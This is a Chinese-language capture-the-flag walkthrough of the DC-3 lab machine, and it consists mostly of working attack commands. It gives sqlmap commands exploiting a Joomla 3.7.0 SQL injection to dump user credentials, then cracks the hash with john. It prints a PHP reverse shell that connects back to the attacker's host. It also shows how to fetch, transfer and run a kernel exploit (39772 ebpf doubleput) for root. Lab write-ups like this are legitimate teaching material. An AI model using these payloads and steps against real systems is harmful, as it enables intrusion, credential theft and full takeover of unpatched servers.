一.信息收集
扫描整个c段网络:nmap 192.168.1.0/24
//目标主机的IP地址:192.168.1.23
//攻击机地址:192.168.1.13
已知目标主机开放了80端口,访问,通过wappalyzer插件知道DC-3的cms事joomla,然后使用专门的针对joomla的工具进行扫描。
joomscan -u "http://192.168.1.23"
通过joomscan命令,知道joomla的版本是3.7.0
192.168.1.23的敏感目录有一个后台登陆管理路径http://192.168.1.23/administrator/
二.漏洞扫描
知道了joomla的版本是3.7.0
用kali自带的漏洞库进行扫描:searchsploit
使用命令
searchsploit joomla 3.7.0
看到有sql注入漏洞,将exp42033.txt提取出来
searchsploit -m 42033.txt
三,漏洞利用
有payload,直接sqlmap跑起来,注意要将原文中的localhost改为目标主机的IP地址
sqlmap -u "http://192.168.1.23/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] --batch
sqlmap -u "http://192.168.1.23/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables -p list[fullordering] --batch
sqlmap -u "http://192.168.1.23/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T "#__users" --columns -p list[fullordering]
sqlmap -u "http://192.168.1.23/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T "#__users" -C name,password --dump -p list[fullordering] --batch
这里密码是加密过的,用john解密,将密码写进一个文件里
`john 1.txt`
解的密码为:snoopy
前面我们得到后台管理的目录,用sqlmap跑出来的账号密码登陆
http://192.168.1.23/administrator/
php反弹shell
$sock = fsockopen("攻击机IP地址","6666");
$descriptorspec = array(
0 => $sock,
1 => $sock,
2 => $sock
);
$process = proc_open('/bin/sh', $descriptorspec, $pipes);
proc_close($process);
在本地上监听6666端口,并访问http://192.168.1.23/index.php
交互式shell
python -c 'import pty; pty.spawn ("/bin/bash")'
cd /root
权限不够!,现在我们要进行提权
四.权限提升
这里我们用到的是系统漏洞提权
/etc/*release 是系统安装时默认的发行版本信息
/proc/version 是系统内核信息
cat /proc/version
cat /etc/*release
可以看到Ubuntu 16.04 LTS 内核是Linux 4.4.0-21
searchsploit Ubuntu 16.04
searchsploit -m 39772.txt
cat 44300.txt
将这个zip文件,转移到靶机中,两种方法
方法1:
在kali中下载
wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip
将下载的39772.zip移动到html目录下
mv 39772.zip /var/www/html
启动apache
systemctl start apache2.service
-----------------------------------------------------------------------------------------
在靶机中下载,wget http://192.168.1.13/39772.zip
解压,unzip 39772.zip
方法二
靶机先开启nc
nc -l 1234 > 39772.zip
----------------------------------------------------
kali中
nc 192.168.1.23 1234 <39772.zip
靶机
ctrl+z,回车
cd 39772
cd ebpf_mapfd_doubleput_exploit
./compile.sh
./doubleput
进入root目录
拿到flag